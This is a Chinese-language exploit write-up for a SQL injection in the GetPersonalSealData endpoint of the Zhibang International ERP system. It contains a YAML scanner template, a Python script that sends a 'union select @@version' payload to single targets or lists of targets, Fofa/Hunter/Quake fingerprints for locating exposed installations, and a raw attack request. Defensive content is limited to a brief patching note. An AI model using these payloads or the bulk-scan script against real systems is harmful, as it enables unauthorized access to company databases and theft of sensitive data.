智邦国际ERP系统（生产版）GetPersonalSealData SQL注入

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者无关！！！

POC（Yaml&Python）

话不多说先上POC（Yam-poc由yakit或ProjectDiscovery Cloud Platform生成，Python-poc脚本由chatgpt生成，准确性请自测.

id: zbintel-erp-GetPersonalSealData-sql-injection

info:
  name: 智邦国际ERP系统（生产版）GetPersonalSealData SQL注入
  author: onewin
  severity: high

  description: 智邦国际ERP系统（生产版）GetPersonalSealData SQL注入

http:
- raw:
  - |+
    @timeout: 30s
    GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=-1%20union%20select%20@@version-- HTTP/1.1
    Host: {{Hostname}}
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Upgrade-Insecure-Requests: 1


  max-redirects: 3
  matchers-condition: and
  matchers:
    - type: word
      part: body
      words:
        - SQL Server
      condition: and

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import argparse
import time
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning

RED = '\033[91m'
RESET = '\033[0m'
# 忽略不安全请求的警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

def check_vulnerability(url):
    try:
        # 构造完整的攻击URL
        attack_url = url.rstrip('/') + "/SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=-1%20union%20select%20@@version--"
  
        response = requests.get(attack_url, verify=False, timeout=10)
  
        # 检查响应状态码和响应体中的关键字
        if response.status_code == 200 and 'SQL Server' in response.text:
            print(f"{RED}URL [{url}] 存在智邦国际ERP系统（生产版）GetPersonalSealData SQL注入漏洞。{RESET}")
        else:
            print(f"URL [{url}] 未发现漏洞。")
    except RequestException as e:
        print(f"URL [{url}] 请求失败: {e}")

def main():
    parser = argparse.ArgumentParser(description='检测目标地址是否存在智邦国际ERP系统（生产版）GetPersonalSealData SQL注入漏洞')
    parser.add_argument('-u', '--url', help='指定目标地址')
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

    args = parser.parse_args()

    if args.url:
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url
        check_vulnerability(args.url)
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            for url in urls:
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url
                check_vulnerability(url)

if __name__ == '__main__':
    main()

漏洞介绍

智邦国际ERP系统是一款综合性的企业资源计划系统，旨在帮助企业实现业务流程的自动化和优化。该系统包括了一系列的功能模块，如财务管理、采购管理、销售管理、库存管理、生产管理等，可以满足企业各方面的需求.其GetPersonalSealData接口userId参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

资产测绘

「Fofa」

icon_hash="-682445886"

「Hunter」

favicon: "0ab4ed9764a33fd85da03b00f44393e1"

「Quake」

favicon: "0ab4ed9764a33fd85da03b00f44393e1"

漏洞复现

「1、构造数据包」

GET /SYSN/json/pcclient/GetPersonalSealData.ashx?imageDate=1&userId=-1%20union%20select%20@@version-- HTTP/1.1
Host: ip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1

「2、查看返回包数据库版本信息」

修复方案

官方已发布安全补丁，建议联系厂商打补丁或升级版本。

引入Web应用防火墙防护，配置接口拦截策略。